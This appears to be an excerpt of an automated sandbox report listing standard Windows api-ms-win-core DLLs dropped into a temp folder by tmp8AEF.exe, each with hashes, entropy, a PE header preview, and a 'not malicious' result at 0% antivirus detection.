                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........1..._..._..._....._...^.._...Z..._...[..._...\.._.a.^.._...^.._...^.B._.a.R..._.a._..._.a..._.a.]..._.Rich.._.................PE..d.....].........." .....x..........h........................................`.......2....`.............................................P...0........@.......0..........H....P.........T...........................@................................................text....v.......x.................. ..`.rdata...v.......x...|..............@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-console-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp8AEF.exe
                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):20248
                                                                                      Entropy (8bit):7.035406046605262
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:iWEhWL4+QpBj0HRN7aebXQHRN7LgkSIlexkdT:Qv+qWaM8V6U
                                                                                      MD5:B56D69079D2001C1B2AF272774B53A64
                                                                                      SHA1:67EDE1C5A71412B11847F79F5A684EABAF00DE01
                                                                                      SHA-256:F3A41D882544202B2E1BDF3D955458BE11FC7F76BA12668388A681870636F143
                                                                                      SHA-512:7EB8FE111DD2E1F7E308B622461EB311C2B9FC4EF44C76E1DEF6C524EB7281D5522AF12211F1F91F651F2B678592D2997FE4CD15724F700DEAFF314A1737B3A8
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0...........`.........................................`...+............ ...................A..............8............................................................................rdata..@...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-datetime-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp8AEF.exe
                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):19736
                                                                                      Entropy (8bit):7.0443036655888225
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:vWEhW/4+QpBj0HRN7TQHRN7Gp1x09lge9://+qWT8Gps9
                                                                                      MD5:5AF784F599437629DEEA9FE4E8EB4799
                                                                                      SHA1:3C891B920FD2703EDD6881117EA035CED5A619F6
                                                                                      SHA-256:7E5BD3EE263D09C7998E0D5FFA684906DDC56DA61536331C89C74B039DF00C7C
                                                                                      SHA-512:4DF58513CF52511C0D2037CDC674115D8ED5A0ED4360EB6383CC6A798A7037F3F7F2D587797223ED7797CCD476F1C503B3C16E095843F43E6B87D55AD4822D70
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0......ey....`.........................................`................ ...................A..............8............................................................................rdata..$...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-debug-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp8AEF.exe
                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):19736
                                                                                      Entropy (8bit):7.049693596229206
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:UPWEhWcHHV/McJW65FdQpBjSdHnhWgN7a8WckW65FdQHnhWgN7a8WshFoodqnajK:wWEhWmJ7QpBj0HRN7GQHRN7FhSIlexEk
                                                                                      MD5:E1CA15CF0597C6743B3876AF23A96960
                                                                                      SHA1:301231F7250431BD122B12ED34A8D4E8BB379457
                                                                                      SHA-256:990E46D8F7C9574A558EBDFCB8739FBCCBA59D0D3A2193C9C8E66807387A276D
                                                                                      SHA-512:7C9DACD882A0650BF2F553E9BC5647E6320A66021AC4C1ADC802070FD53DE4C6672A7BACFD397C51009A23B6762E85C8017895E9347A94D489D42C50FA0A1C42
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..0...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-errorhandling-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp8AEF.exe
                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):19736
                                                                                      Entropy (8bit):7.0758779488098416
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:FvfC5WEhWllQpBj0HRN77lQHRN7QSkclsHd/:Fi5uqWB8Q7/
                                                                                      MD5:8D6599D7C4897DCD0217070CCA074574
                                                                                      SHA1:25EACAAA4C6F89945E97388796A8C85BA6FB01FB
                                                                                      SHA-256:A011260FAFAAAEFD7E7326D8D5290C6A76D55E5AF4E43FFA4DE5FEA9B08FA928
                                                                                      SHA-512:E8E2E7C5BFF41CCAA0F77C3CFEE48DAC43C11E75688F03B719CC1D716DB047597A7A2CE25B561171EF259957BDCD9DD4345A0E0125DB2B36F31698BA178E2248
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0.......j....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-file-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp8AEF.exe
                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):23320
                                                                                      Entropy (8bit):6.972639549935684
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:2BPvVX7WEhWXqEQpBj0HRN7UQHRN7mSIlexb:+PvVXDqHqWU8m6l
                                                                                      MD5:642B29701907E98E2AA7D36EBA7D78B8
                                                                                      SHA1:16F46B0E057816F3592F9C0A6671111EA2F35114
                                                                                      SHA-256:5D72FEAC789562D445D745A55A99536FA9302B0C27B8F493F025BA69BA31941C
                                                                                      SHA-512:1BEAB2B368CC595BEB39B2F5A2F52D334BC42BF674B8039D334C6D399C966AFF0B15876105F0A4A54FA08E021CB44907ED47D31A0AF9E789EB4102B82025CF57
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................@............`.........................................`................0...................A..............8............................................................................rdata..............................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-file-l1-2-0.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp8AEF.exe
                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):19736
                                                                                      Entropy (8bit):7.053716052760641
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:9ZWEhWwqEQpBj0HRN7xnE77QHRN7ICMlly:9ZJHqWNE778r
                                                                                      MD5:F0C73F7454A5CE6FB8E3D795FDB0235D
                                                                                      SHA1:ACDD6C5A359421D268B28DDF19D3BCB71F36C010
                                                                                      SHA-256:2A59DD891533A028FAE7A81E690E4C28C9074C2F327393FAB17329AFFE53FD7B
                                                                                      SHA-512:BD6CF4E37C3E7A1A3B36F42858AF1B476F69CAA4BA1FD836A7E32220E5EFF7CCC811C903019560844AF988A7C77CC41DC6216C0C949D8E04516A537DA5821A3E
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0...........`.........................................`...L............ ...................A..............8............................................................................rdata..\...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-file-l2-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp8AEF.exe
                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):19736
                                                                                      Entropy (8bit):7.113839950805383
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:IVxWEhWnqEQpBj0HRN7HQHRN7YAXAXOVlTS:IVh6HqWH8lAH
                                                                                      MD5:7D4D4593B478B4357446C106B64E61F8
                                                                                      SHA1:8A4969C9E59D7A7485C8CC5723C037B20DEA5C9D
                                                                                      SHA-256:0A6E2224CDE90A0D41926E8863F9956848FFBF19848E8855BD08953112AFC801
                                                                                      SHA-512:7BC9C473705EC98BA0C1DA31C295937D97710CEDEFC660F6A5CB0512BAE36AD23BEBB2F6F14DF7CE7F90EC3F817B02F577317FDD514560AAB22CB0434D8E4E0B
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...).NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-handle-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp8AEF.exe
                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):19736
                                                                                      Entropy (8bit):7.052601866399419
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:XWEhW2lQpBj0HRN7NkhXQHRN7vnR1lp1x09lgerA:37qWw8vRnpss
                                                                                      MD5:7BC1B8712E266DB746914DB48B27EF9C
                                                                                      SHA1:C76EB162C23865B3F1BD7978F7979D6BA09CCB60
                                                                                      SHA-256:F82D05AEA21BCF6337EF45FBDAD6D647D17C043A67B44C7234F149F861A012B9
                                                                                      SHA-512:DB6983F5F9C18908266DBF01EF95EBAE49F88EDC04A0515699EF12201AC9A50F09939B8784C75AE513105ADA5B155E5330BD42D70F8C8C48FE6005513AEFAD2A
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0.......r....`.........................................`..._............ ...................A..............8............................................................................rdata..t...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-heap-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp8AEF.exe
                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):20248
                                                                                      Entropy (8bit):7.028564065154355
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:nZlrPWEhWcrIAjW65FdQpBjSdHnhWgN7a8WcA+0W65FdQHnhWgN7a8W1P5mzVEMW:ZlzWEhWKFQpBj0HRN7JGQHRN7rCMllq
                                                                                      MD5:B071E761CEA670D89D7AE80E016CE7E6
                                                                                      SHA1:C675BE753DBEF1624100F16674C2221A20CF07DD
                                                                                      SHA-256:63FB84A49308B857804AE1481D2D53B00A88BBD806D257D196DE2BD5C385701E
                                                                                      SHA-512:F2ECBDABA3516D92BD29DCCE618185F1755451D95C7DBBE23F8215318F6F300A9964C93EC3ED65C5535D87BE82B668E1D3025A7E325AF71A05F14E15D530D35F
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-interlocked-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp8AEF.exe
                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):19736
                                                                                      Entropy (8bit):7.064651561006373
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:DPWEhWcAQIqyW65FdQpBjSdHnhWgN7a8WcnKW65FdQHnhWgN7a8WwFoodqnajqxB:LWEhWFqEQpBj0HRN7XsQHRN7XSIlex7N
                                                                                      MD5:1DCCF27F2967601CE6666C8611317F03
                                                                                      SHA1:D8246DF2ED9EC4A8A719FD4B1DB4FD8A71EF679B
                                                                                      SHA-256:6A83AB9A413AFD74D77A090F52784B0128527BEE9CB0A4224C59D5C75FC18387
                                                                                      SHA-512:70B96D69D609211F8B9E05FA510EA7D574AE8DA3A6498F5C982AEE71635B8A749162247055B7BA21A884BFA06C1415B68912C463F0F1B6FFB9049F3532386877
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0...........`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-libraryloader-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp8AEF.exe
                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):20248
                                                                                      Entropy (8bit):7.078698929399523
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:GvuBL3BXWEhWfnhLvQpBj0HRN7YQ3QHRN7Tp1x09lgek/:xBL3B3shLvqWYQ38Tps6
                                                                                      MD5:569A7AC3F6824A04282FF708C629A6D2
                                                                                      SHA1:FC0D78DE1075DFD4C1024A72074D09576D4D4181
                                                                                      SHA-256:84C579A8263A87991CA1D3AEE2845E1C262FB4B849606358062093D08AFDC7A2
                                                                                      SHA-512:E9CBFF82E32540F9230CEAD9063ACB1ACEB7CCC9F3338C0B7AD10B0AC70FF5B47C15944D0DCE33EA8405554AA9B75DE30B26AE2CA55DB159D45B6E64BC02A180
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......Gg....`.........................................`................ ...................A..............8............................................................................rdata..(...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-localization-l1-2-0.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp8AEF.exe
                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):22296
                                                                                      Entropy (8bit):7.054401722955359
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:WOMw3zdp3bwjGjue9/0jCRrndbkWEhWE6yQpBj0HRN7LFQHRN7l8pUclXr:WOMwBprwjGjue9/0jCRrndby/qWLF8l4
                                                                                      MD5:1D75E7B9F68C23A195D408CF02248119
                                                                                      SHA1:62179FC9A949D238BB221D7C2F71BA7C1680184C
                                                                                      SHA-256:67EBE168B7019627D68064043680674F9782FDA7E30258748B29412C2B3D4C6B
                                                                                      SHA-512:C2EE84A9AEAC34F7B51426D12F87BB35D8C3238BB26A6E14F412EA485E5BD3B8FB5B1231323D4B089CF69D8180A38DDD7FD593CC52CBDF250125AD02D66EEA9D
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0......U.....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-memory-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp8AEF.exe
                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):20248
                                                                                      Entropy (8bit):7.0496932942785735
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:/qWEhW8nhLvQpBj0HRN78riQHRN7TaSIlexO:ADhLvqWR8W6s
                                                                                      MD5:623283471B12F1BDB83E25DBAFAF9C16
                                                                                      SHA1:ECBBA66F4DCA89A3FAA3E242E30AEFAC8DE02153
                                                                                      SHA-256:9CA500775FEE9FF69B960D65040B8DC415A2EFDE2982A9251EE6A3E8DE625BC7
                                                                                      SHA-512:54B69FFA2C263BE4DDADCA62FA2867FEA6148949D64C2634745DB3DCBC1BA0ECF7167F02FA53EFD69EAAEE81D617D914F370F26CA16EE5850853F70C69E9A61F
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`...l............ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-namedpipe-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp8AEF.exe
                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):19736
                                                                                      Entropy (8bit):7.110045595478065
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:nWEhWC5oQpBj0HRN7EODQHRN7nvp1x09lgefv:nNaqWEo8nvpsH
                                                                                      MD5:61F70F2D1E3F22E976053DF5F3D8ECB7
                                                                                      SHA1:7D224B7F404CDE960E6B7A1C449B41050C8E9C58
                                                                                      SHA-256:2695761B010D22FDFDA2B5E73CF0AC7328CCC62B4B28101D5C10155DD9A48020
                                                                                      SHA-512:1DDC568590E9954DB198F102BE99EABB4133B49E9F3B464F2FC7F31CC77D06D5A7132152F4B331332C42F241562EE6C7BF1C2D68E546DB3F59AB47EAF83A22CF
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......S.....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-processenvironment-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp8AEF.exe
                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):20760
                                                                                      Entropy (8bit):7.026463196608447
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:UWWEhWsxlQpBj0HRN7l1khQHRN7kTPSIlexA:1DqWl1kh8kL62
                                                                                      MD5:1322690996CF4B2B7275A7950BAD9856
                                                                                      SHA1:502E05ED81E3629EA3ED26EE84A4E7C07F663735
                                                                                      SHA-256:5660030EE4C18B1610FB9F46E66F44D3FC1CF714ECCE235525F08F627B3738D7
                                                                                      SHA-512:7EDC06BFA9E633351291B449B283659E5DD9E706DD57ADE354BCE3AF55DF4842491AF27C7721B2ACC6948078BDFC8E9736FEC46E0641AF368D419C7ED6AEBD44
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......G.....`.........................................`...G............ ...................A..............8............................................................................rdata..h...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-processthreads-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp8AEF.exe
                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):21784
                                                                                      Entropy (8bit):7.053725357941814
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:5WXk1JzNcKSImWEhW1qEQpBj0HRN77S4QHRN7j8AXOVlTHxE:5bcKSdkHqW+48j/cE
                                                                                      MD5:95612A8A419C61480B670D6767E72D09
                                                                                      SHA1:3B94D1745AFF6AAFEFF87FED7F23E45473F9AFC9
                                                                                      SHA-256:6781071119D66757EFA996317167904697216AD72D7C031AF4337138A61258D4
                                                                                      SHA-512:570F15C2C5AA599332DD4CFB3C90DA0DD565CA9053ECF1C2C05316A7F623615DD153497E93B38DF94971C8ABF2E25BC1AAAF3311F1CDA432F2670B32C767012A
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-processthreads-l1-1-1.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp8AEF.exe
                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):20248
                                                                                      Entropy (8bit):7.060875826104053
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:iDfIeAWEhWY6yQpBj0HRN7wHQHRN7NjZSIlexL:NemTqWC8NV6d
                                                                                      MD5:D6AD0F2652460F428C0E8FC40B6F6115
                                                                                      SHA1:1A5152871ABC5CF3D4868A218DE665105563775E
                                                                                      SHA-256:4EF09FA6510EEEBB4855B6F197B20A7A27B56368C63CC8A3D1014FA4231AB93A
                                                                                      SHA-512:CEAFEEE932919BC002B111D6D67B7C249C85D30DA35DFBCEBD1F37DB51E506AC161E4EE047FF8F7BF0D08DA6A7F8B97E802224920BD058F8E790E6FA0EE48B22
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0......@!....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-profile-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp8AEF.exe
                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):19224
                                                                                      Entropy (8bit):7.1376464003004685
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:tnjFPWEhWcCTQW65FdQpBjSdHnhWgN7a8Wc//W65FdQHnhWgN7a8WOR5mzVEMqnL:tnhWEhWnqQpBj0HRN7hQHRN7mCMll5i
                                                                                      MD5:654D95515AB099639F2739685CB35977
                                                                                      SHA1:9951854A5CF407051CE6CD44767BFD9BD5C4B0CC
                                                                                      SHA-256:C4868E4CEBDF86126377A45BD829D88449B4AA031C9B1C05EDC47D6D395949D4
                                                                                      SHA-512:9C9DD64A3AD1136BA62CCA14FC27574FAAEBC3DE1E371A86B83599260424A966DFD813991A5EF0B2342E0401CB99CE83CD82C19FCAE73C7DECDB92BAC1FB58A8
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......N.....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-rtlsupport-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp8AEF.exe
                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):20248
                                                                                      Entropy (8bit):7.038577027863076
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:QGeVdWEhWF4+QpBj0HRN7nKQHRN7KFcR8pUclXi:QGeVFp+qWK8AG8pUh
                                                                                      MD5:E6B7681CCC718DDB69C48ABE8709FDD6
                                                                                      SHA1:A518B705746B2C6276F56A2F1C996360B837D548
                                                                                      SHA-256:4B532729988224FE5D98056CD94FC3E8B4BA496519F461EF5D9D0FF9D9402D4B
                                                                                      SHA-512:89B20AFFAA23E674543F0F2E9B0A8B3ECD9A8A095E19D50E11C52CB205DAFDBF2672892FD35B1C45F16E78AE9B61525DE67DBE7673F8CA450AA8C42FEEAC0895
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0.......2....`.........................................`................ ...................A..............8............................................................................rdata..,...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-string-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp8AEF.exe
                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):19736
                                                                                      Entropy (8bit):7.087741938037833
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:nyMvfWEhWtJ7QpBj0HRN7n0QHRN7gTtAXOVlTF2:nyMvPq7qWn08gWd
                                                                                      MD5:BCB412464F01467F1066E94085957F42
                                                                                      SHA1:716C11B5D759D59DBFEC116874E382D69F9A25B6
                                                                                      SHA-256:F040B6E07935B67599EA7E32859A3E93DB37FF4195B28B4451AD0D274DB6330E
                                                                                      SHA-512:79EC0C5EE21680843C8B7F22DA3155B7607D5BE269F8A51056CC5F060AD3A48CED3B6829117262ABA1A90E692374B59DDFE92105D14179F631EFC0C863BFDECB
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
